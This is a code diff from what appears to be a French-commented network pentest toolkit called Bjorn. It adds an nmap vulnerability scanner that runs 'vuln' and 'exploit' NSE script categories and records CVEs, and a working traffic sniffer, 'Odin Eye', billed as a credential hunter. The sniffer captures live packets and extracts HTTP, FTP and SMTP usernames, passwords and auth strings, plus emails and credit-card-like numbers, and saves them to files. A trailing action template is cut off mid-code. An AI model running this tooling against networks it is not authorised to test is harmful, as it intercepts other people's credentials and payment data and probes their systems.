# Paramètres pour le scheduler (inchangés)
|
||||
b_class = "NmapVulnScanner"
|
||||
b_module = "nmap_vuln_scanner"
|
||||
b_status = "NmapVulnScanner"
|
||||
b_port = None
|
||||
b_parent = None
|
||||
b_action = "normal"
|
||||
b_service = []
|
||||
b_trigger = "on_port_change"
|
||||
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
|
||||
b_priority = 11
|
||||
b_cooldown = 0
|
||||
b_enabled = 0
|
||||
b_rate_limit = None
|
||||
|
||||
|
||||
|
||||
class NmapVulnScanner:
|
||||
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE)."""
|
||||
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.nm = nmap.PortScanner()
|
||||
logger.info("NmapVulnScanner initialized")
|
||||
|
||||
# ---------------------------- Public API ---------------------------- #
|
||||
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
logger.info(f"Starting vulnerability scan for {ip}")
|
||||
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
|
||||
|
||||
# 1) metadata depuis la queue
|
||||
meta = {}
|
||||
try:
|
||||
meta = json.loads(row.get('metadata') or '{}')
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2) récupérer ports (ordre: row -> metadata -> DB par MAC -> DB par IP)
|
||||
ports_str = (
|
||||
row.get("Ports") or row.get("ports") or
|
||||
meta.get("ports_snapshot") or ""
|
||||
)
|
||||
|
||||
mac = (
|
||||
row.get("MAC Address") or row.get("mac_address") or
|
||||
""
|
||||
)
|
||||
|
||||
if not ports_str and mac:
|
||||
r = self.shared_data.db.query(
|
||||
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
|
||||
)
|
||||
if r and r[0].get('ports'):
|
||||
ports_str = r[0]['ports']
|
||||
|
||||
if not ports_str and ip:
|
||||
r = self.shared_data.db.query(
|
||||
"SELECT mac_address, ports FROM hosts WHERE ips LIKE ? LIMIT 1",
|
||||
(f"%{ip}%",)
|
||||
)
|
||||
if r:
|
||||
mac = mac or r[0].get('mac_address') or mac
|
||||
ports_str = r[0].get('ports') or ports_str
|
||||
|
||||
if not ports_str:
|
||||
logger.warning(f"No ports to scan for {ip}")
|
||||
return 'failed'
|
||||
|
||||
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
|
||||
mac = mac or row.get("MAC Address") or ""
|
||||
|
||||
# NEW: skip ports déjà scannés (sauf si TTL expiré)
|
||||
ports = self._filter_ports_already_scanned(mac, ports)
|
||||
if not ports:
|
||||
logger.info(f"No new/changed ports to scan for {ip}")
|
||||
# touche quand même les statuts pour désactiver d'éventuelles anciennes entrées
|
||||
self.save_vulnerabilities(mac, ip, [])
|
||||
return 'success'
|
||||
|
||||
|
||||
# Scanner (mode rapide par défaut)
|
||||
findings = self.scan_vulnerabilities(ip, ports)
|
||||
|
||||
# Persistance (split CVE/CPE)
|
||||
self.save_vulnerabilities(mac, ip, findings)
|
||||
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
|
||||
return 'success'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
|
||||
return 'failed'
|
||||
|
||||
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
|
||||
"""
|
||||
Retourne la liste des ports à scanner en excluant ceux déjà scannés récemment.
|
||||
- Config:
|
||||
vuln_rescan_on_change_only (bool, default True)
|
||||
vuln_rescan_ttl_seconds (int, 0 = désactivé)
|
||||
"""
|
||||
if not ports:
|
||||
return []
|
||||
|
||||
if not bool(self.shared_data.config.get('vuln_rescan_on_change_only', True)):
|
||||
return ports # pas de filtrage
|
||||
|
||||
# Ports déjà couverts par detected_software (is_active=1)
|
||||
rows = self.shared_data.db.query("""
|
||||
SELECT port, last_seen
|
||||
FROM detected_software
|
||||
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
|
||||
""", (mac,))
|
||||
seen = {}
|
||||
for r in rows:
|
||||
try:
|
||||
p = str(r['port'])
|
||||
ls = r.get('last_seen')
|
||||
seen[p] = ls
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
|
||||
if ttl > 0:
|
||||
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
|
||||
def fresh(port: str) -> bool:
|
||||
ls = seen.get(port)
|
||||
if not ls:
|
||||
return False
|
||||
try:
|
||||
dt = datetime.fromisoformat(ls.replace('Z',''))
|
||||
return dt >= cutoff
|
||||
except Exception:
|
||||
return True # si doute, on considère "frais"
|
||||
return [p for p in ports if (p not in seen) or (not fresh(p))]
|
||||
else:
|
||||
# Sans TTL: si déjà scanné/présent actif => on skip
|
||||
return [p for p in ports if p not in seen]
|
||||
|
||||
# ---------------------------- Scanning ------------------------------ #
|
||||
|
||||
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
"""
|
||||
Mode rapide (par défaut) :
|
||||
- nmap -sV --version-light sur un set réduit de ports
|
||||
- CPE extraits directement du service detection
|
||||
- (option) --script=vulners pour extraire CVE (si script installé)
|
||||
Fallback (si vuln_fast=False) : ancien mode avec scripts 'vuln', etc.
|
||||
"""
|
||||
fast = bool(self.shared_data.config.get('vuln_fast', True))
|
||||
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
|
||||
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
|
||||
|
||||
p_list = [str(p).split('/')[0] for p in ports if str(p).strip()]
|
||||
port_list = ','.join(p_list[:max_ports]) if p_list else ''
|
||||
|
||||
if not port_list:
|
||||
logger.warning("No valid ports for scan")
|
||||
return []
|
||||
|
||||
if fast:
|
||||
return self._scan_fast_cpe_cve(ip, port_list, use_vulners)
|
||||
else:
|
||||
return self._scan_heavy(ip, port_list)
|
||||
|
||||
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
|
||||
"""Scan rapide pour récupérer CPE et (option) CVE via vulners."""
|
||||
vulns: List[Dict] = []
|
||||
|
||||
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 30s --script-timeout 10s"
|
||||
if use_vulners:
|
||||
args += " --script vulners --script-args mincvss=0.0"
|
||||
|
||||
logger.info(f"[FAST] nmap {ip} -p {port_list} ({args})")
|
||||
try:
|
||||
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
|
||||
except Exception as e:
|
||||
logger.error(f"Fast scan failed to start: {e}")
|
||||
return vulns
|
||||
|
||||
if ip not in self.nm.all_hosts():
|
||||
return vulns
|
||||
|
||||
host = self.nm[ip]
|
||||
|
||||
for proto in host.all_protocols():
|
||||
for port in host[proto].keys():
|
||||
port_info = host[proto][port]
|
||||
service = port_info.get('name', '') or ''
|
||||
|
||||
# 1) CPE depuis -sV
|
||||
cpe_values = self._extract_cpe_values(port_info)
|
||||
for cpe in cpe_values:
|
||||
vulns.append({
|
||||
'port': port,
|
||||
'service': service,
|
||||
'vuln_id': f"CPE:{cpe}",
|
||||
'script': 'service-detect',
|
||||
'details': f"CPE detected: {cpe}"[:500]
|
||||
})
|
||||
|
||||
# 2) CVE via script 'vulners' (si actif)
|
||||
try:
|
||||
script_out = (port_info.get('script') or {}).get('vulners')
|
||||
if script_out:
|
||||
for cve in self.extract_cves(script_out):
|
||||
vulns.append({
|
||||
'port': port,
|
||||
'service': service,
|
||||
'vuln_id': cve,
|
||||
'script': 'vulners',
|
||||
'details': str(script_out)[:500]
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return vulns
|
||||
|
||||
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
|
||||
"""Ancienne stratégie (plus lente) avec catégorie vuln, etc."""
|
||||
vulnerabilities: List[Dict] = []
|
||||
vuln_scripts = [
|
||||
'vuln','exploit','http-vuln-*','smb-vuln-*',
|
||||
'ssl-*','ssh-*','ftp-vuln-*','mysql-vuln-*',
|
||||
]
|
||||
script_arg = ','.join(vuln_scripts)
|
||||
|
||||
args = f"-sV --script={script_arg} -T3 --script-timeout 20s"
|
||||
logger.info(f"[HEAVY] nmap {ip} -p {port_list} ({args})")
|
||||
try:
|
||||
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
|
||||
except Exception as e:
|
||||
logger.error(f"Heavy scan failed to start: {e}")
|
||||
return vulnerabilities
|
||||
|
||||
if ip in self.nm.all_hosts():
|
||||
host = self.nm[ip]
|
||||
discovered_ports: Set[str] = set()
|
||||
|
||||
for proto in host.all_protocols():
|
||||
for port in host[proto].keys():
|
||||
discovered_ports.add(str(port))
|
||||
port_info = host[proto][port]
|
||||
service = port_info.get('name', '') or ''
|
||||
|
||||
if 'script' in port_info:
|
||||
for script_name, output in (port_info.get('script') or {}).items():
|
||||
for cve in self.extract_cves(str(output)):
|
||||
vulnerabilities.append({
|
||||
'port': port,
|
||||
'service': service,
|
||||
'vuln_id': cve,
|
||||
'script': script_name,
|
||||
'details': str(output)[:500]
|
||||
})
|
||||
if 'vuln' in (script_name or '') and not self.extract_cves(str(output)):
|
||||
# On ne stocke plus ces 'FINDING' (pas de CVE)
|
||||
pass
|
||||
|
||||
if bool(self.shared_data.config.get('scan_cpe', False)):
|
||||
ports_for_cpe = list(discovered_ports) if discovered_ports else port_list.split(',')
|
||||
cpes = self.scan_cpe(ip, ports_for_cpe[:10])
|
||||
vulnerabilities.extend(cpes)
|
||||
|
||||
return vulnerabilities
|
||||
|
||||
# ---------------------------- Helpers -------------------------------- #
|
||||
|
||||
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
|
||||
"""Normalise tous les formats possibles de CPE renvoyés par python-nmap."""
|
||||
cpe = port_info.get('cpe')
|
||||
if not cpe:
|
||||
return []
|
||||
if isinstance(cpe, str):
|
||||
parts = [x.strip() for x in cpe.splitlines() if x.strip()]
|
||||
return parts or [cpe]
|
||||
if isinstance(cpe, (list, tuple, set)):
|
||||
return [str(x).strip() for x in cpe if str(x).strip()]
|
||||
try:
|
||||
return [str(cpe).strip()] if str(cpe).strip() else []
|
||||
except Exception:
|
||||
return []
|
||||
|
||||
def extract_cves(self, text: str) -> List[str]:
|
||||
"""Extrait les identifiants CVE d'un texte."""
|
||||
import re
|
||||
if not text:
|
||||
return []
|
||||
cve_pattern = r'CVE-\d{4}-\d{4,7}'
|
||||
return re.findall(cve_pattern, str(text), re.IGNORECASE)
|
||||
|
||||
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
|
||||
"""(Fallback lourd) Scan CPE détaillé si demandé."""
|
||||
cpe_vulns: List[Dict] = []
|
||||
try:
|
||||
port_list = ','.join([str(p) for p in ports if str(p).strip()])
|
||||
if not port_list:
|
||||
return cpe_vulns
|
||||
|
||||
args = "-sV --version-all -T3 --max-retries 2 --host-timeout 45s"
|
||||
logger.info(f"[CPE] nmap {ip} -p {port_list} ({args})")
|
||||
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
|
||||
|
||||
if ip in self.nm.all_hosts():
|
||||
host = self.nm[ip]
|
||||
for proto in host.all_protocols():
|
||||
for port in host[proto].keys():
|
||||
port_info = host[proto][port]
|
||||
service = port_info.get('name', '') or ''
|
||||
for cpe in self._extract_cpe_values(port_info):
|
||||
cpe_vulns.append({
|
||||
'port': port,
|
||||
'service': service,
|
||||
'vuln_id': f"CPE:{cpe}",
|
||||
'script': 'version-scan',
|
||||
'details': f"CPE detected: {cpe}"[:500]
|
||||
})
|
||||
except Exception as e:
|
||||
logger.error(f"CPE scan error: {e}")
|
||||
return cpe_vulns
|
||||
|
||||
# ---------------------------- Persistence ---------------------------- #
|
||||
|
||||
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
|
||||
"""Sépare CPE et CVE, met à jour les statuts + enregistre les nouveautés avec toutes les infos."""
|
||||
|
||||
# Récupérer le hostname depuis la DB
|
||||
hostname = None
|
||||
try:
|
||||
host_row = self.shared_data.db.query_one(
|
||||
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1",
|
||||
(mac,)
|
||||
)
|
||||
if host_row and host_row.get('hostnames'):
|
||||
hostname = host_row['hostnames'].split(';')[0]
|
||||
except Exception as e:
|
||||
logger.debug(f"Could not fetch hostname: {e}")
|
||||
|
||||
# Grouper par port avec les infos complètes
|
||||
findings_by_port = {}
|
||||
for f in findings:
|
||||
port = int(f.get('port', 0) or 0)
|
||||
|
||||
if port not in findings_by_port:
|
||||
findings_by_port[port] = {
|
||||
'cves': set(),
|
||||
'cpes': set(),
|
||||
'findings': []
|
||||
}
|
||||
|
||||
findings_by_port[port]['findings'].append(f)
|
||||
|
||||
vid = str(f.get('vuln_id', ''))
|
||||
if vid.upper().startswith('CVE-'):
|
||||
findings_by_port[port]['cves'].add(vid)
|
||||
elif vid.upper().startswith('CPE:'):
|
||||
findings_by_port[port]['cpes'].add(vid.split(':', 1)[1])
|
||||
elif vid.lower().startswith('cpe:'):
|
||||
findings_by_port[port]['cpes'].add(vid)
|
||||
|
||||
# 1) Traiter les CVE par port
|
||||
for port, data in findings_by_port.items():
|
||||
if data['cves']:
|
||||
for cve in data['cves']:
|
||||
try:
|
||||
# Vérifier si existe déjà
|
||||
existing = self.shared_data.db.query_one(
|
||||
"SELECT id FROM vulnerabilities WHERE mac_address=? AND vuln_id=? AND port=? LIMIT 1",
|
||||
(mac, cve, port)
|
||||
)
|
||||
|
||||
if existing:
|
||||
# Mettre à jour avec IP et hostname
|
||||
self.shared_data.db.execute("""
|
||||
UPDATE vulnerabilities
|
||||
SET ip=?, hostname=?, last_seen=CURRENT_TIMESTAMP, is_active=1
|
||||
WHERE mac_address=? AND vuln_id=? AND port=?
|
||||
""", (ip, hostname, mac, cve, port))
|
||||
else:
|
||||
# Nouvelle entrée avec toutes les infos
|
||||
self.shared_data.db.execute("""
|
||||
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active)
|
||||
VALUES(?,?,?,?,?,1)
|
||||
""", (mac, ip, hostname, port, cve))
|
||||
|
||||
logger.debug(f"Saved CVE {cve} for {ip}:{port}")
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to save CVE {cve}: {e}")
|
||||
|
||||
# 2) Traiter les CPE
|
||||
for port, data in findings_by_port.items():
|
||||
for cpe in data['cpes']:
|
||||
try:
|
||||
self.shared_data.db.add_detected_software(
|
||||
mac_address=mac,
|
||||
cpe=cpe,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
port=port
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"Failed to save CPE {cpe}: {e}")
|
||||
|
||||
logger.info(f"Saved vulnerabilities for {ip} ({mac}): {len(findings_by_port)} ports processed")
|
||||
417
resources/default_config/actions/odin_eye.py
Normal file
@@ -0,0 +1,417 @@
|
||||
|
||||
# --- AJOUTS EN HAUT DU FICHIER ---------------------------------------------
|
||||
import os
|
||||
try:
|
||||
import psutil
|
||||
except Exception:
|
||||
psutil = None
|
||||
|
||||
|
||||
def _list_net_ifaces() -> list[str]:
|
||||
names = set()
|
||||
# 1) psutil si dispo
|
||||
if psutil:
|
||||
try:
|
||||
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
|
||||
except Exception:
|
||||
pass
|
||||
# 2) fallback kernel
|
||||
try:
|
||||
for n in os.listdir("/sys/class/net"):
|
||||
if n and n != "lo":
|
||||
names.add(n)
|
||||
except Exception:
|
||||
pass
|
||||
out = ["auto"] + sorted(names)
|
||||
# sécurité: pas de doublons
|
||||
seen, unique = set(), []
|
||||
for x in out:
|
||||
if x not in seen:
|
||||
unique.append(x); seen.add(x)
|
||||
return unique
|
||||
|
||||
|
||||
# Hook appelée par le backend avant affichage UI / sync DB
|
||||
def compute_dynamic_b_args(base: dict) -> dict:
|
||||
"""
|
||||
Compute dynamic arguments at runtime.
|
||||
Called by the web interface to populate dropdowns, etc.
|
||||
"""
|
||||
d = dict(base or {})
|
||||
|
||||
# Example: Dynamic interface list
|
||||
if "interface" in d:
|
||||
import psutil
|
||||
interfaces = ["auto"]
|
||||
try:
|
||||
for ifname in psutil.net_if_addrs().keys():
|
||||
if ifname != "lo":
|
||||
interfaces.append(ifname)
|
||||
except:
|
||||
interfaces.extend(["wlan0", "eth0"])
|
||||
|
||||
d["interface"]["choices"] = interfaces
|
||||
|
||||
return d
|
||||
|
||||
# --- MÉTADONNÉES UI SUPPLÉMENTAIRES -----------------------------------------
|
||||
# Exemples d’arguments (affichage frontend; aussi persisté en DB via sync_actions)
|
||||
b_examples = [
|
||||
{"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
|
||||
{"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
|
||||
]
|
||||
|
||||
# Lien MD (peut être un chemin local servi par votre frontend, ou un http(s))
|
||||
# Exemple: un README markdown stocké dans votre repo
|
||||
b_docs_url = "docs/actions/OdinEye.md"
|
||||
|
||||
|
||||
# --- Métadonnées d'action (consommées par shared.generate_actions_json) -----
|
||||
b_class = "OdinEye"
|
||||
b_module = "odin_eye" # nom du fichier sans .py
|
||||
b_enabled = 0
|
||||
b_action = "normal"
|
||||
b_category = "recon"
|
||||
b_name = "Odin Eye"
|
||||
b_description = (
|
||||
"Network traffic analyzer for capturing and analyzing data patterns and credentials.\n"
|
||||
"Requires: tshark (sudo apt install tshark) + pyshark (pip install pyshark)."
|
||||
)
|
||||
b_author = "Fabien / Cyberviking"
|
||||
b_version = "1.0.0"
|
||||
b_icon = "OdinEye.png"
|
||||
|
||||
# Schéma d'arguments pour UI dynamique (clé == nom du flag sans '--')
|
||||
b_args = {
|
||||
"interface": {
|
||||
"type": "select", "label": "Network Interface",
|
||||
"choices": [], # <- Laisser vide: rempli dynamiquement par compute_dynamic_b_args(...)
|
||||
"default": "auto",
|
||||
"help": "Interface à écouter. 'auto' tente de détecter l'interface par défaut." },
|
||||
"filter": {"type": "text", "label": "BPF Filter", "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"},
|
||||
"output": {"type": "text", "label": "Output dir", "default": "/home/bjorn/Bjorn/data/output/packets"},
|
||||
"timeout": {"type": "number", "label": "Timeout (s)", "min": 10, "max": 36000, "step": 1, "default": 300},
|
||||
"max_packets": {"type": "number", "label": "Max packets", "min": 100, "max": 2000000, "step": 100, "default": 10000},
|
||||
}
|
||||
|
||||
# ----------------- Code d'analyse (ton code existant) -----------------------
|
||||
import os, json, pyshark, argparse, logging, re, threading, signal
|
||||
from datetime import datetime
|
||||
from collections import defaultdict
|
||||
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/packets"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "odin_eye_settings.json")
|
||||
DEFAULT_FILTER = "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
|
||||
|
||||
CREDENTIAL_PATTERNS = {
|
||||
'http': {
|
||||
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
|
||||
'password': [r'password=([^&]+)', r'pass=([^&]+)']
|
||||
},
|
||||
'ftp': {
|
||||
'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
|
||||
'password': [r'PASS\s+(.+)']
|
||||
},
|
||||
'smtp': {
|
||||
'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
|
||||
}
|
||||
}
|
||||
|
||||
class OdinEye:
|
||||
def __init__(self, interface, capture_filter=DEFAULT_FILTER, output_dir=DEFAULT_OUTPUT_DIR,
|
||||
timeout=300, max_packets=10000):
|
||||
self.interface = interface
|
||||
self.capture_filter = capture_filter
|
||||
self.output_dir = output_dir
|
||||
self.timeout = timeout
|
||||
self.max_packets = max_packets
|
||||
self.capture = None
|
||||
self.stop_capture = threading.Event()
|
||||
|
||||
self.statistics = defaultdict(int)
|
||||
self.credentials = []
|
||||
self.interesting_patterns = []
|
||||
|
||||
self.lock = threading.Lock()
|
||||
|
||||
def process_packet(self, packet):
|
||||
try:
|
||||
with self.lock:
|
||||
self.statistics['total_packets'] += 1
|
||||
if hasattr(packet, 'highest_layer'):
|
||||
self.statistics[packet.highest_layer] += 1
|
||||
if hasattr(packet, 'tcp'):
|
||||
self.analyze_tcp_packet(packet)
|
||||
except Exception as e:
|
||||
logging.error(f"Error processing packet: {e}")
|
||||
|
||||
def analyze_tcp_packet(self, packet):
|
||||
try:
|
||||
if hasattr(packet, 'http'):
|
||||
self.analyze_http_packet(packet)
|
||||
elif hasattr(packet, 'ftp'):
|
||||
self.analyze_ftp_packet(packet)
|
||||
elif hasattr(packet, 'smtp'):
|
||||
self.analyze_smtp_packet(packet)
|
||||
if hasattr(packet.tcp, 'payload'):
|
||||
self.analyze_payload(packet.tcp.payload)
|
||||
except Exception as e:
|
||||
logging.error(f"Error analyzing TCP packet: {e}")
|
||||
|
||||
def analyze_http_packet(self, packet):
|
||||
try:
|
||||
if hasattr(packet.http, 'request_uri'):
|
||||
for field in ['username', 'password']:
|
||||
for pattern in CREDENTIAL_PATTERNS['http'][field]:
|
||||
matches = re.findall(pattern, packet.http.request_uri)
|
||||
if matches:
|
||||
with self.lock:
|
||||
self.credentials.append({
|
||||
'protocol': 'HTTP',
|
||||
'type': field,
|
||||
'value': matches[0],
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'source': packet.ip.src if hasattr(packet, 'ip') else None
|
||||
})
|
||||
except Exception as e:
|
||||
logging.error(f"Error analyzing HTTP packet: {e}")
|
||||
|
||||
def analyze_ftp_packet(self, packet):
|
||||
try:
|
||||
if hasattr(packet.ftp, 'request_command'):
|
||||
cmd = packet.ftp.request_command.upper()
|
||||
if cmd in ['USER', 'PASS']:
|
||||
with self.lock:
|
||||
self.credentials.append({
|
||||
'protocol': 'FTP',
|
||||
'type': 'username' if cmd == 'USER' else 'password',
|
||||
'value': packet.ftp.request_arg,
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'source': packet.ip.src if hasattr(packet, 'ip') else None
|
||||
})
|
||||
except Exception as e:
|
||||
logging.error(f"Error analyzing FTP packet: {e}")
|
||||
|
||||
def analyze_smtp_packet(self, packet):
|
||||
try:
|
||||
if hasattr(packet.smtp, 'command_line'):
|
||||
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
|
||||
matches = re.findall(pattern, packet.smtp.command_line)
|
||||
if matches:
|
||||
with self.lock:
|
||||
self.credentials.append({
|
||||
'protocol': 'SMTP',
|
||||
'type': 'auth',
|
||||
'value': matches[0],
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'source': packet.ip.src if hasattr(packet, 'ip') else None
|
||||
})
|
||||
except Exception as e:
|
||||
logging.error(f"Error analyzing SMTP packet: {e}")
|
||||
|
||||
def analyze_payload(self, payload):
|
||||
patterns = {
|
||||
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
|
||||
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b',
|
||||
'ip_address': r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
|
||||
}
|
||||
for name, pattern in patterns.items():
|
||||
matches = re.findall(pattern, payload)
|
||||
if matches:
|
||||
with self.lock:
|
||||
self.interesting_patterns.append({
|
||||
'type': name,
|
||||
'value': matches[0],
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
def save_results(self):
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
stats_file = os.path.join(self.output_dir, f"capture_stats_{timestamp}.json")
|
||||
with open(stats_file, 'w') as f:
|
||||
json.dump(dict(self.statistics), f, indent=4)
|
||||
if self.credentials:
|
||||
creds_file = os.path.join(self.output_dir, f"credentials_{timestamp}.json")
|
||||
with open(creds_file, 'w') as f:
|
||||
json.dump(self.credentials, f, indent=4)
|
||||
if self.interesting_patterns:
|
||||
patterns_file = os.path.join(self.output_dir, f"patterns_{timestamp}.json")
|
||||
with open(patterns_file, 'w') as f:
|
||||
json.dump(self.interesting_patterns, f, indent=4)
|
||||
logging.info(f"Results saved to {self.output_dir}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def execute(self):
|
||||
try:
|
||||
# Timeout thread (inchangé) ...
|
||||
if self.timeout and self.timeout > 0:
|
||||
def _stop_after():
|
||||
self.stop_capture.wait(self.timeout)
|
||||
self.stop_capture.set()
|
||||
threading.Thread(target=_stop_after, daemon=True).start()
|
||||
|
||||
logging.info(...)
|
||||
|
||||
self.capture = pyshark.LiveCapture(interface=self.interface, bpf_filter=self.capture_filter)
|
||||
|
||||
# Interruption douce — SKIP si on tourne en mode importlib (thread)
|
||||
if os.environ.get("BJORN_EMBEDDED") != "1":
|
||||
try:
|
||||
signal.signal(signal.SIGINT, self.handle_interrupt)
|
||||
signal.signal(signal.SIGTERM, self.handle_interrupt)
|
||||
except Exception:
|
||||
# Ex: ValueError si pas dans le main thread
|
||||
pass
|
||||
|
||||
for packet in self.capture.sniff_continuously():
|
||||
if self.stop_capture.is_set() or self.statistics['total_packets'] >= self.max_packets:
|
||||
break
|
||||
self.process_packet(packet)
|
||||
except Exception as e:
|
||||
logging.error(f"Capture error: {e}")
|
||||
finally:
|
||||
self.cleanup()
|
||||
|
||||
def handle_interrupt(self, signum, frame):
|
||||
self.stop_capture.set()
|
||||
|
||||
def cleanup(self):
|
||||
if self.capture:
|
||||
self.capture.close()
|
||||
self.save_results()
|
||||
logging.info("Capture completed")
|
||||
|
||||
def save_settings(interface, capture_filter, output_dir, timeout, max_packets):
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"interface": interface,
|
||||
"capture_filter": capture_filter,
|
||||
"output_dir": output_dir,
|
||||
"timeout": timeout,
|
||||
"max_packets": max_packets
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="OdinEye: network traffic analyzer & credential hunter")
|
||||
parser.add_argument("-i", "--interface", required=False, help="Network interface to monitor")
|
||||
parser.add_argument("-f", "--filter", default=DEFAULT_FILTER, help="BPF capture filter")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
parser.add_argument("-t", "--timeout", type=int, default=300, help="Capture timeout in seconds")
|
||||
parser.add_argument("-m", "--max-packets", type=int, default=10000, help="Maximum packets to capture")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
interface = args.interface or settings.get("interface")
|
||||
capture_filter = args.filter or settings.get("capture_filter", DEFAULT_FILTER)
|
||||
output_dir = args.output or settings.get("output_dir", DEFAULT_OUTPUT_DIR)
|
||||
timeout = args.timeout or settings.get("timeout", 300)
|
||||
max_packets = args.max_packets or settings.get("max_packets", 10000)
|
||||
|
||||
if not interface:
|
||||
logging.error("Interface is required. Use -i or set it in settings")
|
||||
return
|
||||
|
||||
save_settings(interface, capture_filter, output_dir, timeout, max_packets)
|
||||
analyzer = OdinEye(interface, capture_filter, output_dir, timeout, max_packets)
|
||||
analyzer.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
|
||||
|
||||
|
||||
|
||||
"""
|
||||
# action_template.py
|
||||
# Example template for a Bjorn action with Neo launcher support
|
||||
|
||||
# UI Metadata
|
||||
b_class = "MyAction"
|
||||
b_module = "my_action"
|
||||
b_enabled = 1
|
||||
b_action = "normal" # normal, aggressive, stealth
|
||||
b_description = "Description of what this action does"
|
||||
|
||||
# Arguments schema for UI
|
||||
b_args = {
|
||||
"target": {
|
||||
"type": "text",
|
||||
"label": "Target IP/Host",
|
||||
"default": "192.168.1.1",
|
||||
"placeholder": "Enter target",
|
||||
"help": "The target to scan"
|
||||
},
|
||||
"port": {
|
||||
"type": "number",
|
||||
"label": "Port",
|
||||
"default": 80,
|
||||
"min": 1,
|
||||
"max": 65535
|
||||
},
|
||||
"protocol": {
|
||||
"type": "select",
|
||||
"label": "Protocol",
|
||||
"choices": ["tcp", "udp"],
|
||||
"default": "tcp"
|
||||
},
|
||||
"verbose": {
|
||||
"type": "checkbox",
|
||||
"label": "Verbose output",
|
||||
"default": False
|
||||
},
|
||||
"timeout": {
|
||||
"type": "slider",
|
||||
"label": "Timeout (seconds)",
|
||||
"min": 10,
|
||||
"max": 300,
|
||||
"step": 10,
|
||||
"default": 60
|
||||
}
|
||||
}
|
||||
|
||||
def compute_dynamic_b_args(base: dict) -> dict:
|
||||
# Compute dynamic values at runtime
|
||||
return base
|
||||
|
||||
import argparse
|
||||
import sys
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description=b_description)
|
||||
parser.add_argument('--target', default=b_args['target']['default'])
|
||||
parser.add_argument('--port', type=int, default=b_args['port']['default'])
|
||||
